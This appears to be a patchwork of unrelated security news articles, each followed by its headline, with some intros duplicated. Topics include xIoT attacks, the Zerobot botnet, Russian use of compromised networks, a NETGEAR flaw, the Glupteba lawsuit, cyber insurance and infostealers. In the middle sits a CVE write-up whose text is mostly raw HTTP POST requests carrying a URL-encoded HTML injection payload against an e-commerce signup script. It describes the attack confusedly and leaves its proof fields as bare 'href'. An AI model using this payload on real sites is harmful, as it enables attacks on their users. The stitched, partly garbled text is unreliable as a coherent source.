A world of increasingly connected devices has created a vast attack surface for sophisticated adversaries.

The explosion in connected devices, ranging from the Internet of Things to networking devices and operational technology (collectively known as the Extended Internet of Things, or xIoT), has created a vast, diverse, and largely unmapped attack surface that sophisticated adversaries are actively exploiting.

This growing risk is reflected in many recent reports from companies like Microsoft, Intel 471, and Zscaler that have found a significant uptick in both targeted and untargeted attacks on these devices, with a high rate of malware infections.

However, these threats — particularly when they target IoT devices — are often misunderstood or dismissed, as companies tend to view them as less significant than a traditional network attack. Part of the reason for this is the mistaken belief that IoT threats are mostly limited to botnet malware used for cryptomining and distributed denial-of-service (DDoS) attacks. In reality, IoT attacks are becoming much more sophisticated and now pose serious threats to corporate network integrity, data security, and even physical security systems.

Here are three xIoT attacks every company should be aware of:

**Pivoting From the xIoT Device**

Since many xIoT devices lack even basic native cybersecurity protections, disallow the installation of traditional endpoint security software, and are often unmonitored, they are an effective initial access point for attackers looking to gain a beachhead on a company and then move laterally across its network.

Once the xIoT device has been compromised, the adversary can use this foothold to upload tools, sniff network traffic, search for other exploitable devices, and exfiltrate sensitive data. For example, an attacker can transition from an IoT device into the main IT network, as well as the operational technology (OT) network.

This type of "pivot attack" has already been observed in the wild by multiple companies. My company has seen a growing number of corporate cyberattacks, in which the company was first compromised through a security camera, door controller, or other device, then targeted with ransomware, espionage, or data theft through its IT network.

In 2019, Microsoft Threat Intelligence Center detected an adversary that exploited three different IoT devices (a VoIP phone, a printer, and a video decoder), from which the actor established a presence on the network while looking for further access. Researchers also unveiled a proof-of-concept ransomware that can spread from an xIoT device to an IT network.

**Atypical Data Theft**

xIoT devices can also be direct targets of espionage and data theft.

Certain office devices like connected printers and document scanners are storehouses of sensitive corporate information that is largely unprotected. In the healthcare industry, CT scanners and MRI machines also contain valuable personal and medical information. Industrial devices can pose data breach risks too. Certain OT devices, like programmable logic controllers (PLCs), can contain privileged manufacturing and processing details, such as temperature and pressure ranges, chemical mixing.

This type of sensitive data storage in xIoT devices is often overlooked by traditional information security audits, and the devices themselves offer little, if any, data protection. For remote attackers, gaining access to these devices is usually a trivial matter.

My company has found that 50% of xIoT devices use default passwords, 68% of devices have high-risk or critical CVEs in their firmware, and 26% of these devices are end-of-life and no longer supported. This means in literally half of these cases, all an attacker needs to do is enter in a default password to gain access to privileged data.

**xIoT as a Persistence Strategy**

Threat actors who have already breached a corporate IT network through traditional means like phishing may also carry out a second-stage attack on xIoT devices to achieve long-term persistence inside the organization.

One example is the threat actor UNC3524, which Mandiant recently discovered had been installing a backdoor called QuietExit in opaque network appliances and IoT devices like security cameras, remaining undetected on victims' networks for at least 18 months.

xIoT devices are an ideal hiding place for sophisticated adversaries. These devices are poorly monitored, lack anti-malware and intrusion detection coverage, and are not easy to analyze during incident response. My company has found that over 80% of security teams can't even identify the majority of xIoT devices they have in their networks. They also fall into an administrative gray area in terms of who is responsible for managing them (is it the IT team, the security team, the operations team, or the vendor?), which leads to confusion and inaction.

An adversary can easily install a backdoor in any one of these overlooked xIoT devices that will be exceedingly difficult for the security team to detect. The average enterprise has anywhere from tens of thousands to millions of xIoT devices, and typically relies on manual processes for monitoring and maintaining them. Detecting such a backdoor will be like trying to find a needle in an enormous haystack (or haystacks).

**Preventing the Full Range of xIoT Attacks**

In spite of their many risks, xIoT devices can be sufficiently protected without imposing high costs on a company.

Basic measures such as strong password management and keeping firmware up to date will drastically reduce the risk. Accurate inventorying and regular monitoring are also key.

Where companies will be challenged is in terms of the volume of devices they must protect. This is why automation is important, as manually changing passwords and updating firmware on such a vast array of devices isn't feasible for most companies.

3 xIoT Attacks Companies Aren't Prepared For

The botnet exploits flaws in various routers, firewalls, network-attached storage, webcams, and other products and allows attackers to take over affected systems.

A new botnet is attacking organizations through various vulnerabilities in Internet of Things (IoT) devices from D-Link, Huawei, RealTek, TOTOLink, Zyxel, and more, posing a critical threat that allows attackers to take over vulnerable systems, researchers have found.

The botnet, dubbed Zerobot and written in the Go programming language, includes modules capable of self-replication and self-propagation, as well as attacks for different protocols, a researcher from Fortinet shared in a blog post published Dec. 6.

"Zerobot targets several vulnerabilities to gain access to a device and then downloads a script for further propagation," Fortinet Labs senior antivirus analyst Cara Lin wrote in the post.

So far, researchers have seen two versions of the botnet, one that they began tracking on Nov. 18 and a more sophisticated version that appeared soon after, on Nov. 24, that added a string of new capabilities.

The first version of Zerobot was quite basic, but attackers quickly updated it to include a "selfRepo" module that allows it to reproduce itself and infect more endpoints with different protocols or vulnerabilities, researchers said. The latest version — on which their analysis is based — also includes string obfuscation and a copy file module.

**Attack Mode**

Zerobot initiates an attack by first checking its connection to 1.1.1.1, the DNS resolver server from Cloudflare. It then copies itself onto the targeted device based on the victim's OS type, with different tactics depending on the platform, researchers said.

For Windows, Zerobot copies itself to the "Startup" folder with the filename "FireWall.exe." If the targeted platform is Linux, it has three file paths — "HOME%," "/etc/init/," and "/lib/systemd/system/."

Once it is copied onto the targeted device, Zerobot then sets up an "AntiKill" module to prevent users from disrupting its program once it's started. "This module monitors a particular hex value and uses 'signal.Notify' to intercept any signal sent to terminate or kill the process," Lin wrote.

After initialization, Zerobot starts a connection to its command-and-control (C2) server, ws\[:\]//176\[.\]65\[.\]137\[.\]5/handle, using the WebSocket protocol.

Once it sets up a communication channel, the client waits for a command from the server to unleash any of 21 exploits for various vulnerabilities found in IoT products, as well as some others — including the Java framework vulnerability Spring4Shell, phpAdmin, and F5 Big — "to increase its success rate," Lin wrote.

**Enterprises: Take Immediate Action**

Fortinet included a list of the numerous vulnerabilities that Zerobot exploits, which are found in assorted devices including routers, webcams, network attached storage, firewalls, and other products from a host of well-known manufacturers. 

Lin advised any organization using these devices to update to the latest versions or apply any available patches immediately. Indeed, with businesses losing up to $250 million a year on unwanted botnet attacks, according to a report published last year from Netacea, organizations would be wise to evaluate their environments to discover any device that might be vulnerable to Zerobot, she noted.

"Users should be aware of this new threat, patch any affected systems … running on their network, and actively apply patches as they become available," Lin wrote.

Zerobot Weaponizes Numerous Flaws in Slew of IoT Devices

A novel Go-based botnet called Zerobot has been observed in the wild proliferating by taking advantage of nearly two dozen security vulnerabilities in the internet of things (IoT) devices and other software.
The botnet "contains several modules, including self-replication, attacks for different protocols, and self-propagation," Fortinet FortiGuard Labs researcher Cara Lin said. "It also

Internet of Things / Botnet

A novel Go-based botnet called **Zerobot** has been observed in the wild proliferating by taking advantage of nearly two dozen security vulnerabilities in the internet of things (IoT) devices and other software.

The botnet "contains several modules, including self-replication, attacks for different protocols, and self-propagation," Fortinet FortiGuard Labs researcher Cara Lin said. "It also communicates with its command-and-control server using the WebSocket protocol."

The campaign, which is said to have commenced after November 18, 2022, primarily singles out the Linux operating system to gain control of vulnerable devices.

Zerobot gets its name from a propagation script that's used to retrieve the malicious payload after gaining access to a host depending on its microarchitecture implementation (e.g., "zero.arm64").

The malware is designed to target a wide range of CPU architectures such as i386, amd64, arm, arm64, mips, mips64, mips64le, mipsle, ppc64, ppc64le, riscv64, and s390x.

Two versions of Zerobot have been spotted to date: One used before November 24, 2022, that comes with basic functions and an updated variant that includes a self-propagating module to breach other endpoints using 21 exploits.

This comprises vulnerabilities impacting TOTOLINK routers, Zyxel firewalls, F5 BIG-IP, Hikvision cameras, FLIR AX8 thermal imaging cameras, D-Link DNS-320 NAS, and Spring Framework, among others.

Zerobot, upon initialization in the compromised machine, establishes contact with a remote command-and-control (C2) server and awaits further instructions that allow it to run arbitrary commands and launch attacks for different network protocols like TCP, UDP, TLS, HTTP, and ICMP.

"Within a very short time, it was updated with string obfuscation, a copy file module, and a propagation exploit module that make\[s\] it harder to detect and gives it a higher capability to infect more devices," Lin said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Go-based Zerobot Botnet Exploiting Dozen of IoT Vulnerabilities to Expand its Network

Victims include at least 15 healthcare organizations, one Fortune 500 company, and other organizations in multiple countries, security vendor says.

Russia-affiliated threat actors have compromised systems belonging to multiple organizations in the US, the UK, France, and other countries and are using them to launch attacks against targets in Ukraine.

Among those whose networks the threat actors have hijacked are at least 15 healthcare organizations, one Fortune 500 company, and one dam-monitoring system, according to a study by threat intelligence and cyber-deception company Lupovis published Dec. 6.

"Russian criminals are rerouting through their networks to launch cyberattacks on Ukrainian \[organizations\], which effectively means they are using these organizations to carry out their dirty work," Lupovis warned in its report.

Lupovis recently deployed a set of decoy documents, Web portals, and SSH services on the Internet as part of an effort to study Russian threat activity targeting Ukrainian entities. The goal was to find out the extent to which Russia's war in Ukraine had spilled over into the cyber realm, like many predicted it would.

**Ukraine-Themed Decoys**

The company designed the decoys in a manner as to entice Russian actors looking to compromise Ukrainian targets. For instance, Lupovis labeled decoy documents with names related to Ukrainian government officials and the country's Critical National Infrastructure, and its decoy websites spoofed Ukrainian government and political sites. The decoy documents contained information that adversaries would consider useful, such as usernames, passwords, and addresses to purportedly critical assets and databases on the decoy websites. The company deliberately leaked some of these fake documents in key Dark Web forums.

Lupovis managed to attract three types of adversaries to its decoy sites. One set comprised of opportunistic attackers, or those constantly scanning the Internet for exploitable CVEs and systems. This was a category of threat actor that Lupovis ignored for the purposes of its study. The second category of adversary was comprised of threat actors who landed directly on the decoy sites without following the breadcrumbs that Lupovis had planted on the Dark Web forums. The third set of threat actors were mostly Russia-based adversaries who took the bait, extracted information from the decoy documents, and used it to attack the decoy websites.

In all, between 50 and 60 attackers landed on each of the two decoy sites Lupovis has set up — some of them just minutes after the sites went live. Once on the sites, the attackers carried out a variety of malicious activities, including SQL injection attacks, remote file inclusion tactics, and Docker exploitation attempts. In many cases, threat actors on the decoy sites attempted to make them part of bigger DDoS botnets or to use them to launch attacks against other Ukrainian websites.

The largest group of attackers were independent actors, says Xavier Bellekens, CEO of Lupovis. They often appeared to be acting alone and were part of communities on Telegram, he says. "Some actors were more advanced in their techniques, tactics, and procedures. However, we haven’t yet been able to correlate them against known Russian APTs." 

The primary motivations in many of these attacks appeared to be information stealing, disruption, and using the decoy websites to launch attacks against other Ukrainian targets, he notes.

**Going After Healthcare**

One of the most disconcerting aspects that researchers at Lupovis observed was the number of attacks on its decoys from other, previously compromised websites and systems belonging to healthcare organizations and entities in other industry sectors, from multiple countries. 

Bellekens says Lupovis was unable to identify the specific groups that were carrying out these attacks, or if any of them were previously known Russian advanced persistent threat groups. "We identified them as Russian if they used scripts containing Cyrillic, tried to access Russian websites, \[or\] looked for specific information in Cyrillic," he says. "A large number of these adversaries tried to exploit the decoys further to launch attacks against Ukrainian entities."

Lupovis' findings suggests that fears earlier this year about Russian cyberattacks in Ukraine impacting organizations in other countries were correct. "Russian cyberattacks have skyrocketed and any country or business that has allied with Ukraine, or opposed the war, has become a target," according to the report.

Concerns over such attacks prompted the US Cybersecurity and Infrastructure Security Agency (CISA) to issue an advisory earlier this year urging both government and private organizations to assume a Shields Up posture for detecting and responding to attacks from Russian cyber groups. The advisory followed remarks by President Joe Biden regarding the US government's willingness to respond in kind to any attempt by Russia to attack the US in cyberspace or through other asymmetric means.

Russian Actors Use Compromised Healthcare Networks Against Ukrainian Orgs

By Deeba Ahmed
According to Tenable research, NETGEAR had to release last-minute patches for their devices that were a part of the Pwn2Own event. 
This is a post from HackRead.com Read the original post: NETGEAR Router Vulnerability Allowed Access to Restricted Services

A new report from Tenable, a Columbia, Maryland-based cybersecurity firm, outlined an emerging threat related to NETGEAR and TP-Link routers.

According to Tenable research, both TP-Link and NETGEAR had to release last-minute patches for their devices that were a part of the **Pwn2Own event**. For your information, Pwn2Own is a computer hacking competition held yearly at the CanSecWest security conference since 2007.

Last Minute Patch Issued by TP-Link

According to researchers, the NETGEAR Nighthawk WiFi6 Router (RAX30 AX2400 series) was to be included in the **bug-finding contest at Pwn2Own**. Just one day before the deadline for registering for the contest, the company identified a flaw that invalidated their submission and had to issue a patch urgently.

**What was the Issue?**

According to a **blog post** published by cybersecurity experts at Tenable, network misconfiguration was identified in NETGEAR Nighthawk router versions released before 1.0.9.90. These devices, by default, feature IPv6 for the WAN interface.

The problem is that firewall restrictions in place to determine IPv4 traffic’s access restrictions don’t work on the IPv6 WAN interface. That’s why anyone gaining random access to a service running on the device can listen to IPv6 inadvertently.

For instance, by default, Telnet servers and SSH spawned on Ports 22 and 2. An adversary can exploit this misconfiguration to interact with services accessible only by local network clients.

**Threat Mitigation Response**

Tenable discovered the patch for a flaw pending disclosure on 1st December 2022, and the next day it reached out to the vendor for its CVE identifier.

Those using the affected NETGEAR Nighthawk routers should apply the recently released patch, which can be found **here**.

It must be noted that the auto-update and Check for Updates features of the affected router don’t detect this patch at the moment, so you have to apply it manually.

1.  **415,000 routers infected by cryptomining malware**
2.  **How To Keep Your Router And WiFi Safe From Hackers**
3.  **D-Link home routers plagued with critical vulnerabilities**
4.  **Security flaws turn Netgear Routers into army of botnets**
5.  **Netgear Gaming Router Offers Protection Against DDoS Attacks**

NETGEAR Router Vulnerability Allowed Access to Restricted Services

A cross-site scripting (XSS) vulnerability in the component /signup_script.php of Ecommerce-Website v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the eMail parameter.

**Description:**

The value of the eMail request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The attacker can trick the users of this system, very easy to visit a very dangerous link from anywhere, and then the game will over for these customers. Also, the attacker can create a network from botnet computers by using this vulnerability.

**STATUS: HIGH Vulnerability - CRITICAL**

\[+\] Exploit00:

    POST /ecommerce/index.php?error=If%20you%20lose%20your%20credentials%20information,%20please%20use%20our%20recovery%20webpage%20to%20recover%20your%20account.%20https://pornhub.com HTTP/1.1
    Host: pwnedhost.com
    Accept-Encoding: gzip, deflate
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: en-US;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Cookie: PHPSESSID=td6bitb72h0e1nuqa4ft9q8e2f
    Origin: http://pwnedhost.com
    Upgrade-Insecure-Requests: 1
    Referer: http://pwnedhost.com/ecommerce/index.php
    Content-Type: application/x-www-form-urlencoded
    Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
    Sec-CH-UA-Platform: Windows
    Sec-CH-UA-Mobile: ?0
    Content-Length: 0
    

**Description01:**

JavaScript can be injected into the application response (a vulnerable app - signup\_script.php, no sanitizing submit function). The attacker can crash the MySQL server by sending large bites of POST requests to the MySQL server of this system.

**Real attack: JavaScript attack - type: DDOS SQL injection**

\[+\] Exploit01:

    POST /ecommerce/signup_script.php HTTP/1.1
    Host: pwnedhost.com
    Accept-Encoding: gzip, deflate
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: en-US;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Cookie: PHPSESSID=td6bitb72h0e1nuqa4ft9q8e2f
    Origin: http://pwnedhost.com
    Upgrade-Insecure-Requests: 1
    Referer: http://pwnedhost.com/ecommerce/index.php
    Content-Type: application/x-www-form-urlencoded
    Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
    Sec-CH-UA-Platform: Windows
    Sec-CH-UA-Mobile: ?0
    Content-Length: 1070
    
    eMail=%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%70%6f%72%6e%68%75%62%2e%63%6f%6d%2f%22%20%74%61%72%67%65%74%3d%22%5f%62%6c%61%6e%6b%22%20%72%65%6c%3d%22%6e%6f%6f%70%65%6e%65%72%20%6e%6f%66%6f%6c%6c%6f%77%20%75%67%63%22%3e%0a%3c%69%6d%67%20%73%72%63%3d%22%68%74%74%70%73%3a%2f%2f%63%64%6e%35%2d%63%61%70%72%69%6f%66%69%6c%65%73%2e%6e%65%74%64%6e%61%2d%73%73%6c%2e%63%6f%6d%2f%77%70%2d%63%6f%6e%74%65%6e%74%2f%75%70%6c%6f%61%64%73%2f%32%30%31%37%2f%30%37%2f%49%4d%47%5f%30%30%36%38%2e%67%69%66%3f%3f%74%6f%6b%65%6e%3d%47%48%53%41%54%30%41%41%41%41%41%41%42%58%57%47%53%4b%4f%48%37%4d%42%46%4c%45%4b%46%34%4d%36%59%33%59%43%59%59%4b%41%44%54%51%26%72%73%3d%31%22%20%73%74%79%6c%65%3d%22%62%6f%72%64%65%72%3a%31%70%78%20%73%6f%6c%69%64%20%62%6c%61%63%6b%3b%6d%61%78%2d%77%69%64%74%68%3a%31%30%30%25%3b%22%20%61%6c%74%3d%22%50%68%6f%74%6f%20%6f%66%20%42%79%72%6f%6e%20%42%61%79%2c%20%6f%6e%65%20%6f%66%20%41%75%73%74%72%61%6c%69%61%27%73%20%62%65%73%74%20%62%65%61%63%68%65%73%21%22%3e%0a%3c%2f%61%3e&password=s9L%21c7x%21E2&firstName=WoZykRqh&lastName=cqeMPJcJ
    

**Reproduce:**

href

**Proof and Exploit:**

href

**Real Exploit:**

href

**Real Exploit - code insert:**

href

**Time spent**

1:45

CVE-2022-45990: CVE-nu11secur1ty/vendors/winston-dsouza/ecommerce-website at main · nu11secur1ty/CVE-nu11secur1ty

In December 2021, Google filed a civil lawsuit against two Russian men thought to be responsible for operating Glupteba, one of the Internet's largest and oldest botnets. The defendants, who initially pursued a strategy of counter suing Google for tortious interference in their sprawling cybercrime business, later brazenly offered to dismantle the botnet in exchange for payment from Google. The judge in the case was not amused, found for the plaintiff, and ordered the defendants and their U.S. attorney to pay Google's legal fees.

In December 2021, **Google** filed a civil lawsuit against two Russian men thought to be responsible for operating **Glupteba**, one of the Internet’s largest and oldest botnets. The defendants, who initially pursued a strategy of counter suing Google for tortious interference in their sprawling cybercrime business, later brazenly offered to dismantle the botnet in exchange for payment from Google. The judge in the case was not amused, found for the plaintiff, and ordered the defendants _and their U.S. attorney_ to pay Google’s legal fees.

A slide from a talk given in Sept. 2022 by Google researcher Luca Nagy. https://www.youtube.com/watch?v=5Gz6\_I-wl0E&t=6s

Glupteba is a rootkit that steals passwords and other access credentials, disables security software, and tries to compromise other devices on the victim network — such as Internet routers and media storage servers — for use in relaying spam or other malicious traffic.

Collectively, the tens of thousands of systems infected with Glupteba on any given day feed into a number of major cybercriminal businesses: The botnet’s proprietors sell the credential data they steal, use the botnet to place disruptive ads on the infected computers, and mine cryptocurrencies. Glupteba also rents out infected systems as “proxies,” directing third-party traffic through the infected devices to disguise the origin of the traffic.

In June 2022, KrebsOnSecurity showed how the malware proxy services RSOCKS and AWMProxy were entirely dependent on the Glupteba botnet for fresh proxies, and that the founder of AWMProxy was **Dmitry Starovikov** — one of the Russian men named in Google’s lawsuit.

Google sued Starovikov and 15 other “John Doe” defendants, alleging violations of the Racketeer Influenced and Corrupt Organizations Act (RICO), the Computer Fraud and Abuse Act, trademark and unfair competition law, and unjust enrichment.

In June, Google and the named defendants agreed that the case would proceed as a nonjury action because Google had withdrawn its claim for damages — seeking only injunctive relief to halt the operations of the botnet.

The defendants, who worked for a Russian firm called “**Valtron**” that was also named in the lawsuit, told Google that they were interested in settling. The defendants said they could potentially help Google by taking the botnet offline.

Another slide from Google researcher Luca Nagy’s September 2022 talk on Glupteba.

But the court expressed frustration that the defendants were unwilling to consent to a permanent injunction, and at the same time were unable to articulate why an injunction forbidding them from engaging in unlawful activities would pose a problem.

“The Defendants insisted that they were not engaged in criminal activity, and that any alleged activity in which they were engaged was legitimate,” U.S. District Court Judge Denise Cote wrote. “Nevertheless, the Defendants resisted entry of a permanent injunction, asserting that Google’s use of the preliminary injunction had disrupted their normal business operations.”

While the defendants represented that they had the ability to dismantle the Glupteba botnet, when it came time for discovery — the stage in a lawsuit where both parties can compel the production of documents and other information pertinent to their case — the attorney for the defendants told the court his clients had been fired by Valtron in late 2021, and thus no longer had access to their work laptops or the botnet.

The lawyer for the defendants — New York-based cybercrime defense attorney **Igor Litv****ak** — told the court he first learned about his clients’ termination from Valtron on May 20, a fact Judge Cote said she found “troubling” given statements he made to the court after that date representing that his clients still had access to the botnet.

The court ultimately suspended the discovery process against Google, saying there was reason to believe the defendants sought discovery only “to learn whether they could circumvent the steps Google has taken to block the malware.”

On September 6, Litvak emailed Google that his clients were willing to discuss settlement.

“The parties held a call on September 8, at which Litvak explained that the Defendants would be willing to provide Google with the private keys for Bitcoin addresses associated with the Glupteba botnet, and that they would promise not to engage in their alleged criminal activity in the future (without any admission of wrongdoing),” the judge wrote.

“In exchange, the Defendants would receive Google’s agreement not to report them to law enforcement, and a payment of $1 million per defendant, plus $110,000 in attorney’s fees,” Judge Cote continued. “The Defendants stated that, although they do not currently have access to the private keys, Valtron would be willing to provide them with the private keys if the case were settled. The Defendants also stated that they believe these keys would help Google shut down the Glupteba botnet.”

Google rejected the defendants’ offer as extortionate, and reported it to law enforcement. Judge Cote also found Litvak was complicit in the defendants’ efforts to mislead the court, and ordered him to join his clients in paying Google’s legal fees.

“It is now clear that the Defendants appeared in this Court not to proceed in good faith to defend against Google’s claims but with the intent to abuse the court system and discovery rules to reap a profit from Google,” Judge Cote wrote.

Litvak has filed a motion to reconsider (PDF), asking the court to vacate the sanctions against him. He said his goal is to get the case back into court.

“The judge was completely wrong to issue sanctions,” Litvak said in an interview with KrebsOnSecurity. “From the beginning of the case, she acted as if she needed to protect Google from something. If the court does not decide to vacate the sanctions, we will have to go to the Second Circuit (Court of Appeals) and get justice there.”

In a statement on the court’s decision, Google said it will have significant ramifications for online crime, and that since its technical and legal attacks on the botnet last year, Google has observed a 78 percent reduction in the number of hosts infected by Glupteba.

“While Glupteba operators have resumed activity on some non-Google platforms and IoT devices, shining a legal spotlight on the group makes it less appealing for other criminal operations to work with them,” reads a blog post from Google’s General Counsel **Halimah DeLaine Prado** and vice president of engineering **Royal Hansen**. “And the steps \[Google\] took last year to disrupt their operations have already had significant impact.”

A report from the Polish computer emergency response team (CERT Orange Polksa) found Glupteba was the biggest malware threat in 2021.

Judge Orders U.S. Lawyer in Russian Botnet Case to Pay Google

Preventing all data breaches is an unrealistic goal. Instead, focus on finding and minimizing the greatest risks.

There is a common misconception that all problems have clear, straightforward solutions — as long as you look hard enough. While this is a bold and ambitious goal, it's misguided when applied to cybersecurity.

Organizations cannot prevent data breaches or cyberattacks altogether, and avoiding a breach or cyber incident is nearly impossible in the modern era. Organizations can, however, take steps to reduce an attack's negative impacts.

Before I joined Coalition, I was similarly under the impression that cybersecurity companies should be focused on thwarting attacks. But I have found that companies — especially in the cyber insurance space — are more aptly concentrated on managing risk and creating the right incentives for themselves and their clients to get to an acceptable level of risk.

Why? Eradicating risk is an impractical goal because you cannot "solve" something that constantly changes. Instead, cyber insurers are in the business of helping companies avoid having to file a claim by managing their digital risk.

**To Understand Where Claims Come From, Think Like an Attacker**

Threat actors are, first and foremost, opportunistic. They will always look for the easiest targets to maximize their financial gain. So intimately understanding an organization's level of risk is the first step to managing and reducing it — and making yourself less of a target.

Coalition compiles risk assessment data by analyzing complex public data sets, threat intelligence, and proprietary claims information. For the third year in a row, we gave that data to Verizon, which incorporated it into its most recent "Data Breach Investigations Report" (DBIR). Verizon found four critical ways that threat actors most frequently use to compromise organizations large and small: credential compromise, phishing, vulnerability exploitation, and botnets.

These findings were consistent with our most recent "Cyber Claims Report Mid-year Update," which further found that phishing accounted for 57.9% of reported cyber insurance claims — a 32% increase over 2021. The report also found that ransomware attacks continued an upward trend, with an almost 13% increase in 2022. This increase was nearly as big as the previous five years of attacks combined.

The DBIR also reported that 40% of ransomware incidents involved the use of desktop-sharing software, and 35% involved email. This split attack vector makes it incredibly hard to anticipate.

These findings were once again consistent with Coalition's data. We have observed that ransomware demands continue to hover around an average of $1 million — a high price for any size organization to pay. And these attacks are becoming increasingly complex and harder to prevent.

Ultimately, understanding this complex threat landscape is the first step to being informed and aware of your organization's risk — knowledge that empowers more effective risk management.

**Take Steps to Manage Risk**

Not every organization can afford a dedicated security or IT team or sophisticated cybersecurity technologies, but any organization can implement an appropriate incident response plan and apply an offensive security mindset to mitigate overall risk.

For example, hosting security training can increase positive cybersecurity behaviors from employees, such as developing strong passwords. Implementing multifactor authentication (MFA) and having a backup solution — even that hard drive you take home at the end of each day is better than nothing! — can help reduce risk. Increasing basic email security can also help minimize credential compromise, phishing, and botnet attacks.

Finally, taking the time to map out a system's top vulnerabilities can help organizations gain a macro look at where in their networks they are the most at risk and understand where to prioritize patching; this is all to reduce the likelihood of being exploited by attackers. Some would argue that gaining total visibility into a digital infrastructure is the simplest — and smartest — way for an organization to manage and reduce its risk.

**Where Cyber Insurance Comes Into Play**

Cyber insurers can serve as risk management partners for organizations that need help knowing where to start. They can help these organizations improve their defenses today to reduce negative impacts tomorrow.

Traditional insurance — like that offered for vehicles, natural disasters, and healthcare — maps risk based on predicting the future and evaluating potential costs. But cybersecurity will never be predictable. This is why cyber insurance will never be (and should never be) a one-size-fits-all approach. Organizations cannot simply checkbox their way to a stronger security posture.

Cyber insurance is more than just a fail-safe for when things go wrong. It should work with an organization to improve overall risk exposure. Yes, insurance can absolutely help businesses in dire times, but insurers should focus on assisting companies to avoid disasters in the first place.

Cyber insurance, and all efforts focused on improving cybersecurity defenses, should be ever-evolving. "Solving" dynamic digital risk is a journey, not a destination. In the end, it's about managing and reducing risk, not preventing it altogether.

Cybersecurity Should Focus on Managing Risk

The successful combo of stolen credentials and social engineering to breach networks is increasing demand for infostealers on the Dark Web.

Malicious actors are finding success deploying information stealer (infostealer) malware, combining stolen credentials and social engineering to carry out high-profile breaches and leveraging multifactor authentication (MFA) fatigue attacks.

These were among the findings of a report from Accenture’s Cyber Threat Intelligence team (ACTI) surveying the infostealer malware landscape in 2022, which also noted a spike in the number of Dark Web advertisements for variety of new infostealer malware variants.

The marketplace for compromised credentials is also growing, according to the report, which takes an in-depth look at a Russian market site used by malicious groups RedLine, Raccoon Stealer, Vidar, Taurus, and AZORult to obtain credentials for sale.

Paul Mansfield, cyber-threat intelligence analyst at Accenture, explains the most important point to understand about the rise of the rise of infostealer malware is the threat to corporate networks.

"There are many examples throughout 2022 of infostealer malware being used to harvest the credentials which serve as an entry point for further attacks," he says.

For Mansfield, the most concerning finding from the report was the damage that can be done at such little cost to the threat actor.

"The malware generally costs around $200 for one month plus a few other minor additional costs," he notes. "During that time, they can steal a high volume of credentials from around the globe, pick out the most valuable for targeted attacks — of which there have been several high-profile examples in 2022 — and sell the rest in bulk to marketplaces for others to do the same."

Ricardo Villadiego, co-founder and CEO of Lumu, says the rise of infostealer malware is a consequence of the ransomware-as-a-service business (RaaS) model boom.

"There are as many variants of infostealers as people willing to pay for the code," he explains. "The people behind infostealer malware attacks range from individuals with low technical skills to groups allegedly sponsored by governments."

He adds that what those groups of people have in common is the interest in gathering sensitive data (personal data from their computers, including login credentials, bank account details, cryptocurrency addresses, and granular location data).

"They understand that information is currency in the modern world," Villadiego says.

**Beyond the Limits of MFA**

The report highlighted the growing effectiveness of MFA fatigue attacks, which involve repeated attempts to log on to an MFA-enabled account using stolen credentials, thereby bombarding a potential victim with MFA push requests.

An earlier report found that while MFA has gained adoption among organizations as a way of improving security over passwords alone, increasing theft of browser cookies undermines that security.

"MFA uptake has been rapid since the shift to remote working caused by COVID that now means many workers are conditioned to automatically accepting MFA requests, associating them with security," Mansfield says. "Threat actors have realized this and are attempting to take advantage of it."

Villadiego points out that MFA fatigue is an "incredibly simple" technique, and it was popularized because of the Uber breach.

The bad actor appeals to the user getting "tired" of multiple push notifications claiming to be second-factor verifications and he or she accepts it to make it go away.

"This kind of technique will continue to increase during the holidays and result in high-profile breaches because we have a highly distracted workforce and the temptation to make messages or push notifications go away is even greater," Villadiego predicts.

He says the key takeaway is that the cybercriminal will find a way for the user to fall for the scam.

"They know that if they try hard enough, and consistently enough, the user will eventually cave in," he says. "Companies can have all the best-in-breed protection, but attacks evolve infinitely and defenses must evolve as well."

Villadiego adds it's about having the right controls and the intelligence in place to mitigate all contacts with the adversary as soon as they get in — and to contain the impact that an attack can have on an organization.

Mansfield says as threat actors observe how successful other groups have been in 2022 — e.g., those behind Raccoon Stealer, Redline Stealer, and Vidar — more will enter the scene and create a more competitive market.

"This in turn will drive innovation, so we expect to see new stealers with additional features to those we have seen in 2022," he explains.

Villadiego says that infostealer malware allows cybercriminals to get a "world-class company revenue," and that’s why Accenture forecasts it will keep growing as one of the predominant attacks affecting companies, individuals, and governments in 2023.

"It’s likely that we’ll see infostealers as one of the top three most prevalent attacks by the end of next year, competing hand in hand with Emotet and cryptomining botnets," he says.

**Defending Against Infostealer Malware**

Mansfield says organizations can protect against infostealer malware by ensuring operating systems and software are fully updated and that staff are trained on how to spot and deal with suspicious emails and links and also use antivirus software.

He suggests implementing MFA best practices, pointing to the US Cybersecurity and Infrastructure Security Agency (CISA) as a resource that can provide some guidance on the topic.

Villadiego adds one immediate step an organization can take to shore up defenses against infostealer malware is to look inside the network.

"You need broad visibility, and most companies don't have it," he says. "You need real-time intelligence of when and how the bad actor is getting in, so you can do something about it before the damage is too great to contain."

He says it's important to remember these attacks don't happen in seconds — the adversaries are leaving breadcrumbs and telegraphing what they are about to do, but IT security teams need to spot the attack and have a way to respond to it in real time.

"The bad guys constantly tell us what they are going to do; we just have to look closely, and we have to believe them, not turn a blind eye," he says. "There’s no such thing as small threats."

He points out that many major cyberattacks are preceded by intense cryptomining and domain generation algorithm activity.

